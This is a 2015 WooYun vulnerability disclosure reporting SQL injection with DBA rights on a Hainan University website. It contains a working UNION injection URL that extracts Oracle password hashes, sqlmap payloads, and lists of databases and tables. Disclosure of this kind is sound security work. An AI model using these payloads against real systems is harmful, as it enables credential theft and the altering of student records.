漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:海南大学某站sql注入 dba权限
提交时间:2015-01-08 10:09
修复时间:2015-01-13 10:10
公开时间:2015-01-13 10:10
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
Tags标签:
无
漏洞详情 披露状态:
2015-01-08: 细节已通知厂商并且等待厂商处理中 2015-01-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: dba权限,学校内部系统的数据库貌似都在这台服务器上(50+数据库),查学籍、改成绩神马的都可以
详细说明: 呵呵 http://bszs.hainu.edu.cn/readDetail.aspx?id=-1361' UNION ALL SELECT null,(select wm_concat(name||'~~ '||password||'<br> ') from sys.user$),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
漏洞证明:
http://bszs.hainu.edu.cn/readDetail.aspx?id=-1361' UNION ALL SELECT null,(select wm_concat(name||'~~ '||password||'<br> ') from sys.user$),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
Parameter: id Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-1361' UNION ALL SELECT NULL,CHR(113)||CHR(107)||CHR(104)||CHR(98)||CHR(113)||CHR(79)||CHR(113)||CHR(82)||CHR(98)||CHR(79)||CHR(89)||CHR(120)||CHR(65)||CHR(110)||CHR(117)||CHR(113)||CHR(109)||CHR(99)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- --- web server operating system: Windows 2003 or XP web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: Oracle available databases [58]: [*] BSYJSZSXT [*] CBMS [*] CTXSYS [*] DBBAK [*] DBSNMP [*] DMSYS [*] DYYMZXT [*] EXFSYS [*] HNDXHRM [*] HNDXZFDXC [*] HNDZHDC [*] HRM2ADMIN [*] HSBSYJSZSXT [*] JCZX [*] JWCXXT [*] JWSEARCH [*] LSK_ZFXFZB [*] LXXT [*] MDSYS [*] MHXT [*] OA [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PORTAL [*] SCOTT [*] SFXT [*] STKSCXT [*] SYS [*] SYSMAN [*] SYSTEM [*] TSGZZLX [*] TSMSYS [*] TYMHDLXT [*] VERIFY [*] WMSYS [*] WNMS [*] XDB [*] XGXT [*] XSGZGL [*] YJSJW [*] YJSJWGL [*] YJSJWXT [*] YJSLQXXBDY [*] YJSTEST [*] YJSXT [*] YXXT [*] ZFDXC [*] ZFDXCTEST [*] ZFIM [*] ZFIMN [*] ZFOA [*] ZFSEARCH [*] ZFSMP [*] ZFSOFT_ZFIM [*] ZFSOFT_ZFSMP [*] ZFSOFT_ZFSNS [*] ZFXFZB sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-1361' UNION ALL SELECT NULL,CHR(113)||CHR(107)||CHR(104)||CHR(98)||CHR(113)||CHR(79)||CHR(113)||CHR(82)||CHR(98)||CHR(79)||CHR(89)||CHR(120)||CHR(65)||CHR(110)||CHR(117)||CHR(113)||CHR(109)||CHR(99)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- --- web server operating system: Windows 2003 or XP web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: Oracle Database: YJSJWXT [403 tables] +-----------------------+ | 2006XSJBXXB | | BDJZQKB | | BJDMB | | BJGMDB | | BJPXXB | | BKLBDMB | | BKSJB | | BSS2009 | | BSSXX2009 | | BSWBJBXXB | | BSWBZPB | | BYSFZXXB | | BYSXSJBXXB | | BYYQBZB | | CDDMB | | CFLXDMB | | CJB | | CJDBWYHCYXXB | ........ .......
修复方案: 版权声明:转载请注明来源 路人N @乌云
漏洞回应 厂商回应: 危害等级:无影响厂商忽略
忽略时间:2015-01-13 10:10
厂商回复:
最新状态: 暂无